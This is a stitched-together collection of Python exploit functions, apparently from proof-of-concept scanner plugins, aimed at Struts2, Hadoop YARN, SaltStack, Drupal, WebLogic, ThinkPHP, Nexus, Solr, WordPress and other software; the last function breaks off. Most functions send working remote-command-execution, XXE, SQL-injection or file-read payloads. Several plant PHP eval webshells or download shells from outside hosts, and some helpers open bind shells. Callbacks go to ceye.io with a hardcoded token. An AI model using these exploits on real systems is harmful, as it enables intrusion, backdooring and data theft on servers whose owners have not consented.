def _verify(self):
result = {}
try:
cmd = random_str(16) + '.6eb4yw.ceye.io'
cmd2 = 'ping ' + cmd
payload = '%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27' + cmd2 + '%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'
payload2 = '%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27' + cmd2 + '%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'
action_path = self.get_option('apath') or '/actionChain1.action'
target = self.url + payload + action_path
target2 = self.url + payload2 + action_path
r = requests.get(target, allow_redirects=False)
r1 = requests.get(target2, allow_redirects=False)
if r.status_code == 200 and r1.status_code != 200:
res = requests.get(
'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
)
if cmd in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target
result['VerifyInfo']['Payload'] = payload
elif r1.status_code == 200 and r.status_code != 200:
res = requests.get(
'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
)
if cmd in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target2
result['VerifyInfo']['Payload'] = payload2
except:
pass
return self.parse_output(result)
def _verify(self):
result = {}
payload = random_str(16) + '.6eb4yw.ceye.io'
cmd = 'ping ' + payload
try:
if self.url[-1] == '/':
url1 = self.url + 'ws/v1/cluster/apps/new-application'
url2 = self.url + 'ws/v1/cluster/apps'
else:
url1 = self.url + '/' + 'ws/v1/cluster/apps/new-application'
url2 = self.url + '/' + 'ws/v1/cluster/apps'
resp = requests.post(url=url1)
app_id = resp.json()['application-id']
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '%s' % cmd,
},
},
'application-type': 'YARN',
}
attack = requests.post(
url=url2,
json=data
)
res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
if payload in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.info(e)
return self.parse_output(result)
def _verify(self):
result = {}
try:
m = self.get_option('m')
domain = random_str(16) + '.6eb4yw.ceye.io'
cmd = 'ping ' + domain
channel = self.channel()
payload = ''
if m == 'master':
root_key = self.root_key()
payload = self.master_payload(root_key, cmd)
elif m == 'minions':
payload = self.minions_payload(cmd)
channel.send(payload)
res = requests.get(
'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
)
if cmd in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
pass
return self.parse_output(result)
def _verify(self):
result = {}
cookies = self.login()
random_uri = random_str(16)
logger.info("random_uri为:%s" % random_uri)
verify_payload = "update of_cms_link set link_name=updatexml(1,concat(0x7e,('" + random_uri + "'),0x7e),0) where link_id=4"
post_data = {"sql": verify_payload}
veri_url = urljoin(
self.url, '/ofcms-admin/admin/system/generate/create.json?sqlid=')
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent":
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"Cookie": cookies
}
logger.info("Headres如下:")
logger.info(headers)
try:
resp = requests.post(veri_url, data=post_data, headers=headers)
flag = "~" + random_uri + "~"
if flag in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = verify_payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _attack(self):
result = {}
filename = random_str(6)+'.php'
webshell = '''<?php echo 'DEADBEEF';eval($_REQUEST['CzRee']); ?>'''
url = self.url.rstrip('/') + "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
cmd = '''echo {} | base64 -d | tee {}'''.format(base64.b64encode(webshell.encode()).decode(), filename)
payload = {
'form_id': 'user_register_form',
'_drupal_ajax': '1',
'mail[#post_render][]': 'exec',
'mail[#type]': 'markup',
'mail[#markup]': cmd
}
resp = requests.post(url, data=payload)
r = requests.get(urljoin(self.url, filename))
try:
if 'DEADBEEF' in r.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Postdata'] = payload
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = urljoin(self.url, filename)
result['ShellInfo']['Content'] = 'CzRee'
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def _verify(self):
result = {}
veri_url = urljoin(self.url, '/_async/AsyncResponseService')
cmd = random_str(16) + '.6eb4yw.ceye.io'
payload = self.get_check_payload(cmd)
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
'Accept-Encoding': "gzip, deflate",
'Cookie': "sidebar_collapsed=false",
'Connection': "close",
'Upgrade-Insecure-Requests': "1",
'Content-Type': "text/xml",
'Content-Length': "1001",
'cache-control': "no-cache"
}
try:
requests.post(veri_url, data=payload, headers=headers)
res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
if cmd in res.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _verify(self):
result = {}
CEye_main = CEye(token=self.token)
ceye_subdomain = CEye_main.getsubdomain()
random_uri = random_str(16)
logger.info("random_url为:%s" % random_uri)
verify_payload = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY %% xxe SYSTEM "http://%s/%s">
%%xxe;
]>""" % (ceye_subdomain,random_uri)
logger.warn(verify_payload)
veri_url = self.url
logger.warn(veri_url)
headers = {
"Content-Type": "text/xml",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"SOAPAction": "aaa"
}
try:
resp = requests.post(veri_url,data=verify_payload,headers=headers)
if CEye_main.verify_request(random_uri):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = verify_payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _attack(self):
result = {}
filename = random_str(6) + ".php"
webshell = r'''<?php echo "green day";@eval($_POST["pass"]);?>'''
p = self._check(self.url)
if p:
data = p[1]
# data["vars[1][]"] = "echo '{content}' > {filename}".format(filename=filename,
# content=quote(webshell))
data["vars[1][]"] = "echo '{content}' | tee {filename}".format(filename=filename, content=webshell)
data["vars[0]"] = "system"
vulurl = self.url + p[0]
requests.post(vulurl, data=data)
r = requests.get(self.url + "/" + filename)
if r.status_code == 200 and "green day" in r.text:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = self.url + "/" + filename
result['ShellInfo']['Content'] = webshell
if not result:
vulurl = self.url + r"/index.php?s=index/\think\template\driver\file/write&cacheFile={filename}&content={content}"
vulurl = vulurl.format(filename=filename, content=quote(webshell))
requests.get(vulurl)
r = requests.get(self.url + "/" + filename)
if r.status_code == 200 and "green day" in r.text:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = self.url + "/" + filename
result['ShellInfo']['Content'] = webshell
return self.parse_output(result)
def _verify(self):
result = {}
veri_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
random_uri = random_str(16)
check_host = 'zum76x.ceye.io'
check_port = 80
payload = self.get_check_payload(check_host, check_port, random_uri)
headers = {
"Content-Type":
"text/xml;charset=UTF-8",
"User-Agent":
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
}
try:
requests.post(veri_url, data=payload, headers=headers)
resp = requests.get(
'http://api.ceye.io/v1/records?token=7404ec52d62f743915a2a3adc07a2077&type=request'
)
pattern = 'http://{0}(:{1})?/{2}'.format(check_host, check_port,
random_uri)
if re.search(pattern, resp.text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def do_lfi(self, base_url, session, rand):
PAYLOAD = '%2fetc%2fpasswd'
url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD)
headers = {
'Content-Type': 'application/xml',
'X-NITRO-USER': random_str(length=8),
'X-NITRO-PASS': random_str(length=8),
'rand_key': rand
}
data = '<clipermission></clipermission>'
r = session.post(url=url, headers=headers, data=data, verify=False)
# print(r.text)
return r.text
def _verify(self):
result = {}
try:
target = self.url + '/service/rest/beta/repositories/go/group'
cmd = random_str(16) + '.6eb4yw.ceye.io'
cmd2 = 'ping ' + cmd
payload = "$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('%s')}" % cmd2
data = {
"name": "internal",
"online": "true",
"storage": {
"blobStoreName": "default",
"strictContentTypeValidation": "true"
},
"group": {
"memberNames": [payload]
}
}
requests.post(target, data=json.dumps(data), headers=self._headers)
res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
if cmd in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target
result['VerifyInfo']['Payload'] = payload
except:
pass
return self.parse_output(result)
def _verify(self):
result = {}
cookies = self.login()
CEye_main = CEye(token=self.token)
ceye_subdomain = CEye_main.getsubdomain()
random_uri = random_str(16)
logger.info("random_url为:%s" % random_uri)
verify_payload = "curl%20" + random_uri + "." + str(ceye_subdomain)
veri_url = urljoin(
self.url, '/kylin/api/diag/project/%7c%7c' + verify_payload +
'%7c%7c/download')
headers = {
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent":
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
"Cookie": cookies
}
logger.info("Headres如下:")
logger.info(headers)
try:
resp = requests.get(veri_url, headers=headers)
if CEye_main.verify_request(random_uri):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = veri_url
result['VerifyInfo']['Payload'] = verify_payload
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def read_results(conn, inputs):
if isinstance(conn, telnetlib.Telnet):
flag = random_str(6).encode()
inputs = inputs.strip() + b';' + flag + b'\n'
results = b''
conn.write(inputs)
count = 10
while count:
count -= 1
chunk = conn.read_until(random_str(6).encode(), 0.2)
if len(chunk) > 0:
results += chunk
if results.count(flag) >= 2:
# remove the Telnet input echo
results = results.split(inputs.strip())[-1]
results = os.linesep.encode().join(
results.split(flag)[0].splitlines()[0:-1])
return results.strip() + b'\n'
elif callable(conn):
results = conn(inputs.decode())
if not isinstance(results, bytes):
results = results.encode()
if results.strip() == b'':
results = b'COMMAND NO OUTPUT\n'
return results
elif isinstance(conn, socket.socket):
flag = random_str(6).encode()
inputs = inputs.strip() + b';' + flag + b'\n'
conn.send(inputs)
count = 10
results = b''
while count:
count -= 1
ready = select.select([conn], [], [], 0.2)
if ready[0]:
chunk = conn.recv(1024)
results += chunk
if results.count(flag) >= 2:
break
results = results.split(inputs.strip())[-1]
results = os.linesep.encode().join(
results.split(flag)[0].splitlines()[0:-1])
return results.strip() + b'\n'
return b'\n'
def _attack(self):
'''TODO 添加参数有效性验证
返回一个webshell'''
def _cmdExec(_cmd):
url = urljoin(self.url, 'wp-login.php?action=lostpassword')
cmd = '''{{run{{{}}}}}'''.format(_cmd)
cmd = cmd.replace(' ', '${substr{10}{1}{$tod_log}}').replace(
'/', '${substr{0}{1}{$spool_directory}}')
urlsp = urlsplit(url)
payload = '{netloc}(any -froot@localhost -be ${cmd} null)'.format(
netloc=urlsp.netloc.split(':')[0], cmd=cmd)
headers = {
'Host': payload,
'Content-Type': 'application/x-www-form-urlencoded'
}
data = {
'wp-admin': 'Get+New+Password',
'redirect_to': '',
'user_login': self.get_option('username')
}
r = requests.post(url=url, headers=headers, data=data)
return
# 不能有:
# wget 命令不能用,暂时不知道为什么
# cmd = '''/bin/wget raw.githubusercontent.com/ree4pwn/webshell/master/php/s.php'''
# _cmdExec(_cmd=cmd)
# cmd = '''/usr/bin/wget raw.githubusercontent.com/ree4pwn/webshell/master/php/s.php'''
# _cmdExec(_cmd=cmd)
filename = random_str(6) + '.php'
filename = filename.lower()
cmd = '''/usr/bin/curl -o {writePath} {fileurl}'''.format(
writePath=os.path.join(self.get_option('writePath'), filename),
fileurl=self.get_option('shellUrlDownload'))
_cmdExec(_cmd=cmd)
result = {}
url = urljoin(self.url, 'wp-login.php?action=lostpassword')
urlsp = urlsplit(url)
payload = '{netloc}(any -froot@localhost -be $CMDXXXXX null)'.format(
netloc=urlsp.netloc.split(':')[0])
r = requests.get(urljoin(self.url, filename))
try:
if 'DEADBEEF' in r.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Postdata'] = payload
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = urljoin(self.url, filename)
result['ShellInfo']['Content'] = 'CzCzCz'
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def bind_shell(obj, rce_func='_rce', check=True):
if not (isinstance(obj, POCBase) and hasattr(obj, rce_func)
and callable(getattr(obj, rce_func))):
return False
conn = getattr(obj, rce_func)
if check:
flag = random_str(6).encode()
if flag not in read_results(conn, b'echo %s' % flag):
return False
start_listener(conn)
def create_session(self, base_url, session):
url = '{0}/pcidss/report'.format(base_url)
params = {
'type': 'allprofiles',
'sid': 'loginchallengeresponse1requestbody',
'username': '******',
'set': '1'
}
headers = {
'Content-Type': 'application/xml',
'X-NITRO-USER': random_str(length=8),
'X-NITRO-PASS': random_str(length=8),
}
data = '<appfwprofile><login></login></appfwprofile>'
session.post(url=url, params=params, headers=headers,
data=data, verify=False)
return session
def bind_tcp_shell(host, port, check=True):
if not check_port(host, port):
return False
try:
s = socket.socket()
s.connect((host, port))
if check:
flag = random_str(6).encode()
if flag not in read_results(s, b'echo %s' % flag):
return False
start_listener(s)
except Exception as e:
logger.error(str(e))
def exploit(self, mode):
result = {}
rand_path = random_str()
vul_url1 = urljoin(self.url, "/" + rand_path)
vul_url2 = urljoin(self.url, "/" + rand_path + "/.php")
resp1 = requests.get(vul_url1)
resp2 = requests.get(vul_url2)
if resp1.status_code == 404 and "No input file specified" in resp2.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return result
def _verify(self):
result = {}
try:
cmd = random_str(16) + '.6eb4yw.ceye.io'
cmd2 = 'ping ' + cmd
header = self._headers(cmd2)
r = requests.get(self.url, headers=header)
if r.status_code == 200 :
res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
if cmd in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = cmd2
except:
pass
return self.parse_output(result)
def _verify(self):
result = {}
try:
cmd = random_str(16) + '.6eb4yw.ceye.io'
cmd2 = 'ping ' + cmd
self.trigger_rce(cmd)
res = requests.get(
'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
)
if cmd in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = cmd2
except Exception as e:
pass
return self.parse_output(result)
def bind_telnet_shell(host, port, user, pwd, check=True):
if not check_port(host, port):
return False
try:
tn = telnetlib.Telnet(host, port)
tn.expect([b'Login: '******'login: '******'\n')
tn.expect([b'Password: '******'password: '******'\n')
tn.write(b'\n')
if check:
flag = random_str(6).encode()
if flag not in read_results(tn, b'echo %s' % flag):
return False
start_listener(tn)
except Exception as e:
logger.error(str(e))
def _verify(self):
result = {}
try:
cmd = random_str(16) + '.6eb4yw.ceye.io'
cmd2 = 'ping ' + cmd
params = {
"redirectUri": "%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + cmd2 + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}" + "\n"
}
r = requests.post(self.url, params=params, headers=self._headers)
if r.status_code == 200:
res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
if cmd in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = params
except:
pass
return self.parse_output(result)
def _verify(self):
result = {}
try:
target = self.url + '/service/extdirect'
cmd = random_str(16) + '.6eb4yw.ceye.io'
cmd2 = 'ping ' + cmd
payload = "{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\ny,\\n 'Exploit.Test234',\\nz.getBytes('latin1'),0,\\n3054\\n);x.getMethod('test', ''.class).invoke(null, '%s');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}" % cmd2
requests.post(target, data=payload, headers=self._headers)
res = requests.get(
'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
)
if cmd in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target
result['VerifyInfo']['Payload'] = payload
except:
pass
return self.parse_output(result)
def _shell(self):
result = {}
random_uri = random_str(16)
try:
shell_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_shell.php'
base64_payload = base64.b64encode(shell_payload.encode())
shell_content = base64_payload.decode()
shell_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + shell_content
print(shell_url)
cookies = {
"zentaosid": self.get_option("zentaosid")
}
down_res = requests.get(shell_url,cookies=cookies)
shell_info_url = self.url + '/data/client/'+random_uri+'/php_shell.php'
logger.info("webshell地址:" + shell_info_url)
shell_res = requests.get(shell_info_url,cookies=cookies)
except Exception as e:
logger.warn(str(e))
return self.parse_output(result)
def _verify(self):
result = {}
try:
cmd = random_str(16) + '.6eb4yw.ceye.io'
cmd2 = 'ping ' + cmd
payload = "?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=" + cmd2 + "&pp=____A&ppp=%20&encoding=UTF-8"
target = self.url + payload
r = requests.get(target, headers=self._headers)
if r.status_code == 200:
res = requests.get(
'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
)
if cmd in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
except:
pass
return self.parse_output(result)
def _attack(self):
result = {}
filename = random_str(6) + ".php"
shell_addr = "http://pocsuite.org/include_files/php_attack.txt"
payload = "/index.php?s=captcha&Test=print_r(file_put_contents(%27{filename}%27,file_get_contents(%27{url}%27)))".format(
filename=filename, url=shell_addr)
vul_url = self.url + payload
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = "_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=print_r(file_put_contents(%27{filename}%27,file_get_contents(%27{url}%27)))".format(
filename=filename, url=shell_addr)
requests.post(vul_url, data=data, headers=headers)
r = requests.post(self.url + "/" + filename,
data="c=phpinfo();",
headers=headers)
if r.status_code == 200 and "PHP Extension Build" in r.text:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = self.url + "/" + filename
result['ShellInfo']['Content'] = shell_addr
return self.parse_output(result)
def _verify(self):
result = {}
try:
target = self.url + '/users'
cmd = random_str(16) + '.6eb4yw.ceye.io'
cmd2 = 'ping ' + cmd
payload = "username[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('%s')]=&password=&repeatedPassword=" % cmd2
r = requests.post(target, data=payload, headers=self._headers)
if r.status_code == 500:
res = requests.get(
'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns'
)
if cmd in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target
result['VerifyInfo']['Payload'] = payload
except:
pass
return self.parse_output(result)
def _verify(self):
result = {}
p = 'ping '
cmd = random_str(16) + '.6eb4yw.ceye.io'
payload = p + cmd
try:
core_name = self._get_core_name(self.url)
if self._update_config(self.url, core_name):
url = self.url + "/solr/" + core_name + "/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27" + payload + "%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
response = requests.get(url=url)
logger.info(response.text)
res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
if cmd in res:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
logger.info(e)
return self.parse_output(result)
def _attack(self):
result = {}
filename = random_str(6) + ".php"
webshell = r'''<?php echo "green day";@eval($_POST["pass"]);?>'''
p = self._check(self.url)
if p:
data = p[1]
data[
"vars[1][]"] = "echo%20%27{content}%27%20>%20{filename}".format(
filename=filename, content=quote(webshell))
data["vars[0]"] = "system"
vulurl = self.url + p[0]
post_r = requests.post(vulurl, data=data)
data_function_value = data["function"]
